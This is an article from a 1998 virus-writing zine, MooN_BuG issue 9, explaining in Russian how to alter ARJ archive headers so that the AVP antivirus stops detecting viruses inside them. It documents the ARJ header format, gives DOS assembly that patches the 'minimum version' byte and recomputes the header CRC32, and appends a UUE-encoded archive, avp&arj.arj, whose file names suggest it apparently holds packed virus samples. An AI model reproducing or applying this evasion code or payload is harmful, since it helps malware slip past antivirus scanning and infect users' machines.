[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 9, Dec 1998 file 00C
stealth in arj;)
by VVS
Изменяем заголовок arj-архива и avp перестает детектить вири в аржах.
Тупо все это, но т.к. avp в следующем году выпустит лечилку для архивов, то...
=== Cut ===
Arj comment/file packet header type :
OFFSET LABEL TYP VALUE DESCRIPTION
------ ----------- ---- ----------- ----------------------------------
00 ARJSIG DW EA60 Local File Header Signature
02 HEADERSIZE DW 0000 Header size , variable
04 INTERNSIZE DB 00 Size between here and host data
05 VERSIONBY DB 00 Version made by
06 VERSIONMIN DB 00 Minimum version need to extract
07 HOSTOS DB 00 Host operating system
value: 0 = MSDOS 3 = AMIGA 6 = APPLE GS 9 = VAX VMS
1 = PRIMOS 4 = MAC-OS 7 = ATARI ST
2 = UNIX 5 = OS/2 8 = NEXT
08 FLAGS DB 00 Flags
Value: 1 = GARBLED_FLAG
2 = NOT USED
4 = VOLUME_FLAG
8 = EXTFILE_FLAG
10h = PATHSYM_FLAG
20h = BACKUP_FLAG
09 CMPMETHOD DB 00 Compression method
Value: 0 = STORED 1 = MOST COMPRESSED
2 = MIDDLE PLUS COMPRESSED 3 =MIDDLE FAST COMPRESSION
4 = FASTEST COMPRESSED
0A FILETYPE DB 00 Type of the file
Value: 0 = BINARY 1 = 7-BIT TEXT
3 = DIRECTORY 4 = VOLUMELABEL
0B RESERVED DB 'Z' always 'Z' (not sure)
0C DOSTIME DW 0000 Time of creation of the file,Dos style
0E DOSDATE DW 0000 Date of creation of the file,Dos style
10 COMPRESSIZ HEX 00000000 Compressed size
14 ORIGSIZ HEX 00000000 Uncompressed size
18 CRC32 HEX 00000000 The CRC32 of compressed datas
1C FILENAME DS ? Filename with Null-End
?? COMMENT DS ? Comment with Null-End
?? HEADCRC32 HEX 00000000 CRC32 of the header
?? EXTENDHEAD DW 0 Extended Header - Unused
=== Cut ===
.model tiny
.code
.286
.startup
mov ax,3d02h
mov dx,offset arjname
int 21h
jc exit
xchg ax,bx
mov ah,3fh
mov cx,100h
mov dx,offset buffer
int 21h
push bx
mov di,offset buffer
mov byte ptr ds:[di+6],4 ; Minimum version need to extract
mov bx,word ptr ds:[di+2]; header size
lea di,[di+bx+4]
mov bx,di
sub di,(offset buffer+4) ; length
lea si,[buffer+4]
call calculate_crc
mov [bx],cx ; CRC32 of the header
mov [bx+2],dx ;
pop bx
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
mov ah,40h
mov cx,100h
mov dx,offset buffer
int 21h
mov ah,3eh
int 21h
exit:
ret
calculate_crc:
cld
push bx
mov cx,0ffffh
mov dx,cx
next3:
xor ax,ax
xor bx,bx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
next2:
shr bx,1
rcr ax,1
jae next1
xor ax,08320H
xor bx,0EDB8H
next1:
dec dh
jne next2
xor cx,ax
xor dx,bx
dec di
jne next3
not dx
not cx
pop bx
mov ax,dx
ror ax,cl
add ax,cx
ret
arjname db 'test.arj',0
buffer:
end
=== Cut ===
section 1 of 1 of file avp&arj.arj -={ UUE 1.06, ARA (C) 1995 }=-
begin 644 avp&arj.arj 12-4-1998 19:43:6
M8.HK`!X'`0`0``)B8IV$)6*=A"4``````````````````$%64"9!4DHN05)*
M``!4IWD@``!@ZB@`'@<!`!`!`&+)*U`E3`(``,0)```<A_*G```@````1$5!
M1"Y#3U\``+S2*1D```(B8ML6-+_97W<JA-;X8JHKMK+#4+M2F6(((Q=6GX(<
MCA*&(&5?@B7-WO!2TE-2Z.I$HV"Q>YC9E$U<$@ZUSP5@FPG;(59^#$$Y52GL
M.)1:R"\E^<[\N\PT0,.06!84$')G$ER5@D5>JE2I4J5*O^Q)V"]VO\R5X3OP
M=@/G[_1PBLT["PZ,J[R\[UO7YVD4]P\%^<5QF+%B5?G84C;3S!')F]>`('NS
MED^:@OF&_'C^./\B90,B?X'ZE`6+-G9-0XLPR(++D2[5GBN<5?&N1&Z>@8OC
M=U3/+,=TG[]I$TM@E09EOYH]^ZS_.P^V;E>K*P6]`W0;,A]D-WIXIANB@9-1
M2JJ\S$S$]\0N]XB-7XHDQ)P7\NCJ(]BS?54--RG0D41_61G98ZD)]1C=`$N]
M>$CIPAM$^J"%SWDJ%RI=[X"1T81.I-\!)W>>0WOM2Z>TL4!%CW`4`EM$AS@1
M=B3\`126J82`3?HP!.K-`38<H1N8X,-U[@P_FXW:4K:)(\T6U04%MHXNFO.F
M27G4BDTS-%F^3/!;QIG4:@,"\J"]59(V+D)#@`3=/[F55\TV+EPIK\1'S`;C
M=XCQ:WT@]'8B98J:VY;+/-/9J0T@&IZ@*)`7,:)-(P[<2D7:N?I)'9"1R"HG
MYX*`6PZ\6]A<@=<)37,0`DZ$&(PZ9=<PI0[GMS[#A6N[Z[='6!"WX^2(^I1'
M_1THMY%K[AS[$=N0IR:G6`LNE23T4`:N!)TIH7ET/]Y!:N2^O<AUD-;#;NY/
M$MK-QCX\W`HZVQW5F+AUH&#J+``>!P$`$`$`8L=I<"52`0``/`(``$2-OUL`
M`"````!&4DE%3D0M0BY#3U\``(_'-/,```$W8GWUB6^?_O<R?2%8$L5@^?<3
M@4$:28I)2"XF%JJZD5*4CZKH.!%3E[`A8&.R+0A9[%%@A"P^P/<QS`HX^RVB
MP1X&"P01#1'5^;?R&$&FRO#,$O&<;\5-)&?QS1R*E%$>F_'`A0L_+S(3SB>C
M/H4:DY'DICVJ22:5(=#D&?)/&\/H)H_Z>.2DFI2&?.4X7K[]2=H3>#0ARH\I
MRQ(,N1A+8H68+GM\L)(A;P-]TG\7[!%7`DQ;*!?7$7N!.`Q>$66%J"@NU1U`
MFV)-P>9'ZQH?B'.'23<6C&+@87F`CXO*&\Z)DLG=\,TD>WG@R<7.!A`1<@+0
M:UO1$N@)DXFPR=:#79.LN/!3YK?:OJV8C"JQ-2F:K?Q&NW[==VNWTA5VY[1U
M19OOT?U\"L,*9L7!\*WVU;QN("6VVL?'=76/1W8L;/TIANYT%RR==`*H`$QH
'S@_\8.H``,
`
end
sum -r/size 60436/1547 section (from "begin" to "end")
sum -r/size 24101/1087 entire input file
=== Cut ===
